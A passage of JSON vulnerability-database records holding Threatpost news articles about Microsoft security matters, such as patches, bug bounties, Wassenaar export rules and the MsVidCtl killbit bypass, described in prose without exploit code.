sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054337/microsoft_sdl_01.jpg)](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday \nguidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security \nDevelopment Lifecycle (SDL) to Agile, an umbrella term for a \ndevelopment model frequently used for Web-based applications released \nunder short deadlines, called \u201csprints.\u201dilding online applications and for those \nusing the Agile code-development process. [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic & International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe & Johnson LLP, said during the panel. Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:03", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053837/microsoftsecurity.jpg)](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>)\n\nA security researcher from nCircle is accusing Microsoft of gamesmanship in its description of an unpatched IIS vulnerability in the way the WebDAV extension decodes a requested URL. The end result is that a successful exploit would allow a hacker to bypass authentication and gain unauthorized access to resources.\n\n\u201cMicrosoft has classified this issue two different ways in two different places,\u201d he said. \u201c[On the SRD blog ](<http://blogs.technet.com/srd/archive/2009/05/18/more-information-about-the-iis-authentication-bypass.aspx>)(it) refers to this as a Information Disclosure vulnerability, while [the Microsoft Advisory ](<http://www.microsoft.com/technet/security/advisory/971492.mspx>)refers to this as an elevation of privilege,\u201d says nCircle\u2019s Tyler Reguly.\n\nThe point, he said, is that the bug should be called what it is\u2013an access control breach or an authentication bypass. SRD acknowledges the Authentication Bypass but downplays it because you are accessing a single page with the anonymous user privileges, he added.\n\n[Read the full story](<http://securitywatch.eweek.com/browsers/security_researcher_microsoft_downplaying_iis_vulnerability.html?kc=rss>) [eweek.com]\n\nHere\u2019s [our previous coverage](<https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/>) of this issue.\n", "cvss3": {}, "published": "2009-05-21T00:03:55", "type": "threatpost", "title": "Microsoft accused of downplaying IIS flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:07", "id": "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "href": "https://threatpost.com/microsoft-accused-downplaying-iis-flaw-052009/72754/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "description": "In parallel with its release of 17 bulletins on Patch Tuesday this month, Microsoft also unveiled two new tools that are meant to help make a couple of common exploitation scenarios more difficult for attackers.\n\nThe company released a tool called Office File Validation for some older versions of Office, including Office 2003 and 2007. The feature is specifically designed to give users information about whether there\u2019s a potentially malicious component in an Office file that the user is trying to open. When the user attempts to open a file, the Office File Validation tool will inspect it and look for any signs of malicious behavior. If there\u2019s a problem, the user will get a warning dialog box giving him the opportunity to cancel the operation.\n\nAttackers in the past few months have taken to embedding malicious Flash files inside Word and Excel documents as part of spear phishing campaigns. This was the primary attack vector used to compromise RSA last month.\n\n\u201cOffice File Validation helps detect and prevent a kind of exploit \nknown as a file format attack. File format attacks exploit the integrity \nof a file, and occur when the structure of a file is modified with the \nintent of adding malicious code. Usually the malicious code is run \nremotely and is used to elevate the privilege of restricted accounts on \nthe computer. As a result, an attacker could gain access to a computer \nthat was not previously accessible,\u201d Microsoft said in its [advisory on the validation tool](<https://www.microsoft.com/technet/security/advisory/2501584.mspx>). \n\n\u201cThis could enable an attacker to \nread sensitive information from the computer\u2019s hard disk drive or to \ninstall malware, such as a worm or a key logging program. The Office \nFile Validation feature helps prevent file format attacks by scanning \nand validating files before they are opened. To validate files, Office \nFile Validation compares a file\u2019s structure to a predefined file schema, \nwhich is a set of rules that define what a readable file looks like. If \nOffice File Validation detects that a file\u2019s structure does not follow \nall rules described in the schema, the file does not pass validation.\u201d\n\nThe second enhancement Microsoft pushed out on Tuesday is an [update to winload.exe](<https://www.microsoft.com/technet/security/advisory/2506014.mspx>), the component that loads Windows. The update is designed to help prevent some techniques that rootkits use to evade detection and remain persistent on infected machines.\n\n\u201cFor a rootkit to be successful it must stay hidden and persistent on \na system. One way we have seen rootkits hide themselves on 64-bit \nsystems is bypassing driver signing checks done by winload.exe. While \nthe update itself won\u2019t remove a rootkit, it will expose an installed \nrootkit and give your anti-malware software the ability to detect and \nremove the rootkit,\u201d Microsoft\u2019s Dustin Childs said. \n", "cvss3": {}, "published": "2011-04-12T19:00:28", "type": "threatpost", "title": "Microsoft Pushes Out Two New Security Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:45", "id": "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "href": "https://threatpost.com/microsoft-pushes-out-two-new-security-tools-041211/75129/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:03", "description": "Since the beginning of recorded time, security researchers, software vendors and hackers have been issuing security advisories in all kinds of nutty formats. Some feature excellent ASCII art, some have clever inside jokes and some come from Microsoft. Now, there\u2019s a effort underway, called the Common Vulnerability Reporting Framework, to standardize the way that vulnerabilities are reported so that they\u2019re in a common, machine-readable format. \n\nThe [CVRF](<http://www.icasi.org/cvrf>) is the product of a group called the Industry Consortium for Advancement of Security on the Internet, and Microsoft in May for the first time produced its monthly Patch Tuesday advisories in the CVRF format. The company said that while the CVRF itself is still in its initial stages and will continue to evolve, the current version should give enterprise customers a good option for automating bulletin deployment. \n\n\u201cFor many customers, a machine-readable markup framework for security releases might not be a pressing need. For instance, home-computer users or small businesses may choose to install security updates automatically. However, many business customers spend time \u201ccopying and pasting\u201d our security bulletin content into their risk management systems, spreadsheets and corporate notification emails manually as part of their IT security compliance and remediation task list,\u201d [Microsoft\u2019s Mike Reavey](<http://blogs.technet.com/b/msrc/archive/2012/05/17/microsoft-security-updates-and-the-common-vulnerability-reporting-framework.aspx>) said in a blog post on CVRF.\n\n\u201cFor these customers, this machine-readable format may enable more efficiency and automation. Faster and more efficient guidance for these customers means they can more quickly ensure protection, which is always our goal. For those that do not require automation, we will continue to offer our bulletins in the current format.\u201d\n\nICASI members include IBM, Cisco, Juniper, Nokia and Amazon, among other companies. The current version of CVRF is 1.1, the second iteration, and the framework will continue to change as users provide feedback and requirements evolve.\n\n\u201cCVRF was created to fill a major gap in vulnerability standardization: the lack of a standard framework for the creation of vulnerability report documentation. Although the computer security community had made significant progress in several other areas, including categorizing and ranking the severity of vulnerabilities in information systems with the widespread adoption of the Common Vulnerabilities and Exposures (CVE) dictionary and the Common Vulnerability Scoring System (CVSS), this lack of standardization was evident in every vulnerability report, best practice document, or security bulletin released by any vendor or coordinator,\u201d the CVRF documentation says.\n", "cvss3": {}, "published": "2012-05-18T17:52:11", "type": "threatpost", "title": "Microsoft Adopts CVRF Format for Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:A21BD1B60411A9861212745052E23AE7", "href": "https://threatpost.com/microsoft-adopts-cvrf-format-security-bulletins-051812/76582/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates falls under the Foundational tier. The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there has also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and a well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says their needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks as well as strategic analysis of threats face and information sought by attackers should be shared too.\n\nLaws can compel incident reporting, but they do not increase trust or collaboration nor do they reduce risks\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\n> Microsoft publishes guidance on establishing and operating threat information sharing exchanges\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-publishes-information-sharing-guidelines%2F110740%2F&text=Microsoft+publishes+guidance+on+establishing+and+operating+threat+information+sharing+exchanges>)\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. \u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. \u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:46", "description": "![Patch Tuesday](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073225/micro_patch_12.jpg)Microsoft announced today that it plans on shipping seven bulletins, five critical, two important, for the [December edition](<http://technet.microsoft.com/en-us/security/bulletin/ms12-dec>) of its monthly patch Tuesday security bulletin release cycle.\n\nThe year\u2019s last scheduled batch of patches will address 11 vulnerabilities in all currently supported operating systems, including Microsoft Windows, Internet Explorer (IE 6-10), Office and the company\u2019s Server Software.\n\nIf left unpatched, six of the seven bulletins could lead to remote code execution while the last could allow a hacker to bypass one of Windows\u2019 security features.\n\nQualys\u2019 Wolfgang Kandek notes on the company\u2019s [Laws of Vulnerabilities blog](<http://laws.qualys.com/2012/12/december-2012-patch-tuesday-pr.html>) that the third bulletin, rated critical, affects Microsoft Word, suggesting the vulnerability may leverage Outlook to display documents without the users\u2019 interaction.\n\nThe bulletin summaries will be released in their entirety next Tuesday, December 11 and per usual, the company is set to host a [Technnet webcast](<https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032522564&Culture=en-US>) discussing the vulnerabilities and patch management practices the following day, December 12 at 11 a.m.\n", "cvss3": {}, "published": "2012-12-06T19:07:50", "type": "threatpost", "title": "Microsoft Fixing 11 Vulnerabilities for December Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:07", "id": "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "href": "https://threatpost.com/microsoft-fixing-11-vulnerabilities-december-patch-tuesday-120612/77289/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:19", "description": "Estimates of the extent of cyber crime are hopelessly overblown, two computer security researchers argue in an [editorial from Sunday\u2019s New York Times](<http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html>).\n\nArguing counter to the prevailing opinion that online crime is a modern day Yukon Gold Rush for entrepreneurial hackers, the two Microsoft researchers say that evidence suggests that only a sliver of the world\u2019s cyber crooks get rich from their illegal activity, while most struggle to make it. \n\n\u201cIf getting rich were as simple as downloading and running software, wouldn\u2019t more people do it?\u201d researchers Dinei Flor\u00eancio and Cormac Herley ask in their Times editorial, \u201cThe Cybercrime Wave That Wasn\u2019t.\u201d\n\nThe editorial synthesizes the findings of a raft of research from Herley and his colleagues that cast doubt on the estimates of the size of the cyber underground \u2013 many of which were funded by private security firms with an interest in making cyber crime appear to be a large and pressing problem.\n\nThe two studied surveys of cyber crime affecting consumers and companies. They conclude that estimates of the amount by which cyber crime make a number of common errors in trying to extrapolate the extent of global cyber criminal activity. Surveys, for example, mistakenly ratchet up the numbers when they try to scale small survey groups to the overall population. The two also single out the adverse effect \u2018unverified outliers\u2019 can have on data. In their research, 90 percent of estimates are skewed by input from one or two individuals. \u201cUpward bias\u201d \u2013 a tendency of overstating a general phenomenon based on statistical evidence \u2013 permeated all of the surveys the two looked over, according to the piece.\n\nThe editorial draws from a paper issued by Herley and Flor\u00eancio; \u201cSex, Lies and Cyber-crime Surveys\u201d in which the two researchers [reasoned that cyber crime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>) are \u201cso compromised and biased that no faith whatever can be placed in their findings.\u201d When the research was published the duo called their assessment harsh but insisted that when it comes to security research, unreliable data is just masquerading as reliable data.\n\nThe thoughts also echo some that Herley, a principal researcher at Microsoft, has expressed before. In 2009, Herley challenged the concept that the underground cyber crime community\u2019s size and vitality are forces to be reckoned with.\n\nIn a June 2009 [podcast with Threatpost editor Dennis Fisher](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) still applicable today, Herley rationalized that it\u2019s hard to get an accurate reading on some security metrics and that the value of the underground economy was being oversold.\n\nIn a recent publication for IEEE Security And Privacy Magazine, Herley [took a similar, contrarian stance against popular coverage of banking fraud](<https://threatpost.com/money-mules-not-customers-real-victims-bank-fraud-032712/>), noting that money mules, not the account holders were the most victimized by online bank heists. \n", "cvss3": {}, "published": "2012-04-17T18:33:53", "type": "threatpost", "title": "Errors, Outliers Obscure Cybercrime Losses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:26", "id": "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "href": "https://threatpost.com/errors-outliers-obscure-cybercrime-losses-041712/76449/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:47", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054257/ie_skull_.jpg)](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>)Ryan Smith, one of the researchers who found the bug in the Microsoft MsVidCtl DLL that the vendor is rushing to patch this week, has posted a [short video demonstration](<http://www.hustlelabs.com/bh2009preview/>) of a technique that bypasses the stop-gap solution of preventing the vulnerable ActiveX control from loading.\n\nIn the demo, Smith, a former researcher with IBM ISS who will be giving a talk on the exploit at the Black Hat conference later this week with Mark Dowd and David Dewey, shows that setting the killbit on the vulnerable control, as Microsoft and others suggested, is not sufficient to prevent exploitation. The demo shows Smith using a new tool called Killbit Visualizer to log the IDs of killbits that are specifically allowed or denied.\n\nHe is then able to get around the killbit protection on the vulnerable video control and cause the calculator to start on the machine.\n\nSmith\u2019s demo comes on the heels of a [blog post by Halvar Flake](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>), a well-known security researcher, who pointed out nearly three weeks ago that simply setting the killbit was not going to protect users against the MsVidCtl flaw. From his post:\n\nSo, where does this leave us ?\n\n 1. The bug is actually much \u201cdeeper\u201d than most people realize.\n\n 2. The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.\n\n 3. The bug might have weaseled it\u2019s way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.\n\n 4. If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.\n\n 5. Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.\n\n 6. There might be a lot of recompiling next week.\n\n 7. IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.\n\nMicrosoft is rushing out an [emergency patch for the vulnerability](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>) on Tuesday.\n", "cvss3": {}, "published": "2009-07-27T15:29:15", "type": "threatpost", "title": "Researcher Shows Killbit is No Defense on MsVidCtl Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:45", "id": "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "href": "https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/73016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:12", "description": "VANCOUVER \u2013 Successful exploits at the Pwn2Own contest get all the glitz, but the rarities are the exploits that fail.\n\nA group of four young South Korean hackers from ASRT, all of them well shy of their thirtieth birthdays, stood in proxy for Jung Hoon Lee. 